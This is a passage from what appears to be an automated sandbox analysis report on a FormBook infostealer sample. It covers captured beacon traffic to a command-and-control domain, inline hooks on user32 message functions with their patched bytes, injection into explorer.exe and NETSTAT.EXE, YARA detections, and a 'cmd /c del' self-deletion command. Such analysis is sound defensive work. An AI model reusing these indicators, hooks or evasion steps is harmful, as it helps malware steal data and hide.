                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      3 | 192.168.2.4 | 49770 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:43.295202017 CEST | 5901 | OUT | GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.tententacleshydro.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:43.409063101 CEST | 5902 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605e0bc6-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function Name | Hook Type | Active in Processes
                                      PeekMessageA | INLINE | explorer.exe
                                      PeekMessageW | INLINE | explorer.exe
                                      GetMessageW | INLINE | explorer.exe
                                      GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function Name | Hook Type | New Data
                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1
                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1

                                      Statistics

                                      Behavior


                                      System Behavior

                                      General

                                      Start time: 12:26:42
                                      Start date: 08/04/2021
                                      Path: C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x400000
                                      File size: 227550 bytes
                                      MD5 hash: E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 12:26:43
                                      Start date: 08/04/2021
                                      Path: C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x400000
                                      File size: 227550 bytes
                                      MD5 hash: E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 12:26:46
                                      Start date: 08/04/2021
                                      Path: C:\Windows\explorer.exe
                                      Wow64 process (32bit): false
                                      Commandline:
                                      Imagebase: 0x7ff6fee60000
                                      File size: 3933184 bytes
                                      MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 12:26:57
                                      Start date: 08/04/2021
                                      Path: C:\Windows\SysWOW64\NETSTAT.EXE
                                      Wow64 process (32bit): true
                                      Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
                                      Imagebase: 0xdd0000
                                      File size: 32768 bytes
                                      MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: moderate

                                      General

                                      Start time: 12:27:02
                                      Start date: 08/04/2021
                                      Path: C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit): true
                                      Commandline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x11d0000
                                      File size: 232960 bytes
                                      MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 12:27:02
                                      Start date: 08/04/2021
                                      Path: C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase: 0x7ff724c50000
                                      File size: 625664 bytes
                                      MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      Disassembly

                                      Code Analysis
